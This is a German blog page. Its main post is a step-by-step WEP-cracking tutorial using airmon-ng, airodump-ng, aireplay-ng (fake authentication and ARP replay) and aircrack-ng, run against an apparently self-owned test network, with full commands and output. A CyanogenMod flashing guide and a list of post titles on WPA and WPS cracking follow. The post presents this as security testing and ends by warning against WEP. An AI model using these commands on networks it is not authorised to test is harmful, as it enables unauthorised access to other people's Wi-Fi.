 

 aircrack-ng für Smartphones?
Auch eine interessante Sache. Unterwegs Wlan-Sicherheit prüfen:
In diesem Artikel wird erklärt welche Handys dafür geeignet sind und wie die Installation vonstatten geht.
Die Vorbereitungen

Also, wenn noch nicht geschehen aircrack-ng installieren. Es befindet sich praktischerweise in den Repositories von Debian/Ubuntu und Arch Linux.
Auch braucht es ein Passendes Empfangsgerät. Ich benutze und empfehle den Asus WL-167G V3 Wlan USB Stick, 802.11n

 hat mir schon treue Dienste erwiesen.
Auch müssen wireless tools installiet sein. Wie erfährst man hier:
Can’t find wireless tools, exiting.

USB Wlan Adapter in den monitor mode bringen
Mit dem Tool airmon-ng kann man also seinen Wlan Adapter dazu bringen zu lauschen.
root@burrotinto ~ # airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
460    dhcpcd

Interface    Chipset        Driver

wlan0        RTL8187     rtl8187 - [phy0]
                (monitor mode enabled on mon0)
das wäre erledigt.
 
Wlan Netzwerke finden
Um jetzt unser Wlan Netzwerk zu finden nimmt man airodump-ng.
airodump-ng mon0
Zeigt uns alle Netze in Reichweite an
CH 9 ][ Elapsed: 12 s ][ 2012-07-27 22:36 ][ paused output
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BC:05:43:17:CC:61 -62 30 0 0 7 54e. WEP WEP BurroTinto Test
BSSID STATION PWR Rate Lost Packets Probes
Wie man hier sieht hat das Netz BurroTinto Test eine WEP Verschlüsselung und die MAC-Adresse BC:05:43:17:CC:61 auf dem Kanal 7.
 
Sammeln von Paketen
Um jetzt ein WEP zu knacken braucht es genug IVS um dadurch den Schlüssel errechnen zu können.
 airodump-ng -w ~BURROTINTO -i -c 7 --bssid BC:05:43:17:CC:61  mon0
Hiermit schalten wir uns auf Kanal 7 auf und zeichnen nur Daten von der MAC BC:05:43:17:CC:61 auf.
CH  7 ][ Elapsed: 1 min ][ 2012-07-27 22:51 ][ paused output                                        

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                     

 BC:05:43:17:CC:61  -59 100     1116        1    0   7  54e. WEP  WEP         BurroTinto Test                                                                                           

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Jetzt heißt es warten bis man genügend #Data gesammelt hat.
 
Key berechnen
Jetzt kommt das Tool an die reihe das dem ganzem Packet den Namen gab aircrack-ng.

Das startet man jetzt am besten in einer neuen Konsole mit:
aircrack-ng ~/*.ivs
und los gehts:
                                 Aircrack-ng 1.1

                 [00:00:10] Tested 179713 keys (got 4 IVs)

   KB    depth   byte(vote)
    0    5/ 47   D2(  36) 00(   0) 01(   0) 02(   0) 04(   0) 
    1    5/  6   86(  36) 00(   0) 01(   0) 02(   0) 03(   0) 
    2    5/  6   BB(  36) 01(   0) 02(   0) 03(   0) 04(   0) 
    3    5/  3   D3(  36) 00(   0) 01(   0) 02(   0) 03(   0) 
    4    5/  4   B5(  36) 00(   0) 01(   0) 02(   0) 03(   0) 

Failed. Next try with 5000 IVs.
Da man unter Umständen mehrere Millionen IVs braucht um den Schlüssel zu bekommen kann man die Sache etwas beschleunigen.
 
aireplay-ng Datensammeln beschleunigen
Grundlage jeden Angriffs ist das man sich erstmals bei dem Opfer anmeldet.
aireplay-ng -1 0 -a BC:05:43:17:CC:61 mon0
-a MAC des Ziels

-h MAC des eigenen Wlan adapters

So sieht das aus wenn es erfolgreich war.
No source MAC (-h) specified. Using the device MAC (00:15:AF:22:11:A1)
23:07:38  Waiting for beacon frame (BSSID: BC:05:43:17:CC:61) on channel 7

23:07:38  Sending Authentication Request (Open System) [ACK]
23:07:38  Authentication successful
23:07:38  Sending Association Request [ACK]
23:07:38  Association successful   (AID: 1)
Jetzt gehts ans eingemachte mit einem ARP-request. Dadurch wird ein Paket immer hin und her gesendet und somit der Traffic erhöht.
aireplay-ng -3 -b BC:05:43:17:CC:61  mon0
Es gibt noch viele andere Attacken die man schön in der manpage von aireplay-ng nachlesen kann. Inklusive Pro und Contra.
Immer schön ein Auge auf dem Fenster mit aircrack-ng haben denn dort erscheint der gefundene Key.
 
Fazit
Wer ein sicheres Wlan Netz haben will sollte die Finger von WEP lassen. WPA ist zwar erheblich schwerer zu knacken aber wer auf nummer sicher gehen will sollte zuhause auf ein Wlan Netzwerk verzichten.

 



CyanogenMod 10 (Jelly Bean) für das Samsung Galaxy S i9000
Florian Klinger — Thu, 26 Jul 2012 07:39:07 +0000
CyanogenMod 10 Android 4.1.1 Jelly Bean [ALPHA Version] für das Galaxy S i9000 aufgetaucht
Es ist da! Eine Alpha Version für Android 4.1.1 Jelly Bean, meines bevorzugten Android ROM CyanogenMod, ist nun aufgetaucht. Zwar keine offizielle aber trotzdem ziemlich stabile.
Bei XDA Developers kann man den dazugehörigen Post nachlesen.
Frohnaturen wie ich wollen natürlich gleich das ausprobieren.

Download CyanogenMod 10 [ALPHA][unofficial]
Zuerst mal die neuste Version von CyanogenMod 10 hier downloaden.
Die cm-10-********-UNOFFICIAL-galaxysmtd.zip auf sein Handy schieben, wer die Google Apps auch dazu haben möchte nimmt noch die gapps-jb-20120716.zip mit.
 
Die Installation
Von Jelly Bean aus:
Wer bereits eine Jelly Bean Version auf seinem hat, der hat es am einfachsten. Einfach über ClockworkMod Recovery oder ins Recovery Booten (Drei Tasten Kombo) und von aus flashen alternativ auch gleich die gapps.
Von CM7/CM9 aus:
Booten ins Recovery, dort einen vollen wipe machen (wipe data/factory reset + wipe cache partition). Dann kann auch hier gleich aus dem Recovery oder ClockworkMod geflasht werden alternativ auch gleich die gapps.
Von allem anderen aus:

Handy rooten. Ich empfehle diese Möglichkeit: Samsung Galaxy S i9000 Unbrick, unroot, werkszustand und wieder root mit Heimdall
Handy ausschalten und in den Recovery Modus booten lassen (Power, Menü und lauter Taste). Dann durch das Menü navigieren (Laut / leiser ist hoch / runter, Power ist auswählen)
wipe data/factory reset
Yes -- delete all user data
wipe cache partition
Yes - Wipe Cache
- install zip from sdcard
- choose zip from sdcard
cm-10-********-UNOFFICIAL-galaxysmtd.zip

- Yes - Install cm-10-********-UNOFFICIAL-galaxysmtd.zip

Alternativ auch hier gleich die gapps installieren
reboot


Fertig

BurroTinto

Android dual sim Smartphones

Dual Sim und Android?

Samsung i9082 Galaxy Grand

Hero H2000+

Samsung Galaxy S Duos S7562

Alcatel One Touch 997D

Sony Xperia E

Mobistel Cynus T2

Phicomm i800

Phicomm i600

Wer kennt noch welche?

aircrack-ng mobile, mit dem Handy wpa, wpe und wps hacken.

Kann man mit dem Android oder iPhone WLAN Netzwerke hacken?

Installation von aircrack-ng

reaver wps crack aufs N900 bringen

tadadadaaaaaaaa

http input type=”image” value an php übergeben

Wie man value eines input type=”image” an php weitergibt

Lösung

Beispiel:

Beispiel mit sql Abfrage

Raspberry PI: ebay Sniper mit JBidwatcher ohne GUI

Cool auf Auktionen Snipen mit dem RASPBERRY PI

Die Abhängigkeiten Xvfb und openjdk-6-jre installieren

Xvfb Starten und Startscript erstellen

Jetzt kommt der JBidwatcher dran

Probestart

Der letzt Schritt automatisch starten

USB-Ethernet für das Nexus7 mit Cyanogenmod

Es ist doch möglich! – USB – Ethernet für das Nexus 7 mit Installiertem Cyanogenmod 10.1

Installation

VNC über USB für Android

Android Handy / Tablet über USB Fernsteuern

1. root

2. VNC-Server für Android

3. ADB

Anletung für Linux

4. VNC-Viewer für den PC

Blitz für das Galaxy S

Blitz Cover für das geliebte Galaxy S i9000

adb: error: insufficient permissions for device

Fehler beim Versuch Android mit adb zu Verbinden

NEXUS 7 Root mit Linux

Rooten eines Google NEXUS 7 in Linux

Unlock NEXUS7

Nun wird das NEXUS 7 gerootet

Google Chrome mit Proxy Benutzen

Wie man den Google Chrome Browser mit einem nicht Systemweiten Proxy benutzt

apt-get proxy

apt-get durch Proxy benutzen

WordPress Sicherheit und admin wordlist

WordPress Sicherheit

Ist dein Blog gefährdet?

Plugins

Benutzername und Passwort

Sicheres Passwort

Benutzername

Nach Passwörtern suchen

Hier die Passwortliste

CyanogenMod 10 Nightly (Jelly Bean) für Galaxy S i9000

Endlich da CyanogenMod 10 Nightly

Vorbereitung

Download

Installation

Google Apps

Fehler: status 7 bei der CyanogenMod Installation

Pyrit beschleunigung mit Cuda / OpenCL und Datenbank

Schneller WPA cracken mit Pyrit Cuda / OpenCL und SQLite

Installation von Pyrit Cuda oder Pyrit OpenCL

Unter Arch Linux

Andere Linux Distributionen

Pyrit Datenbank benutzen

Vorbereitungen

Zustand der Datenbank

Befüllen der Datenbank

Angriff mit Pyrit Database

Virtualbox: failed: libQtCore.so.4: cannot open shared object file: No such file or directory

VirtualBox: supR3HardenedMainGetTrustedMain: dlopen(“/usr/lib/virtualbox/VirtualBox.so”,) failed: libQtCore.so.4: cannot open shared object file: No such file or directory

modprobe vboxdrv

Die Abhängigkeiten `Xvfb` und `openjdk-6-jre` installieren

`Xvfb` Starten und Startscript erstellen

Fehler: `status 7` bei der CyanogenMod Installation

Mittels `seq` eine Datei erstellen

`seq` ausgabe an `pyrit` mittels `pipe` weiterleiten

Buchstaben Liste mit `crunch` erstellen

`cruch` Ausgabe an `pyrit` weiterreichen

Bedeutung der `df` Schalter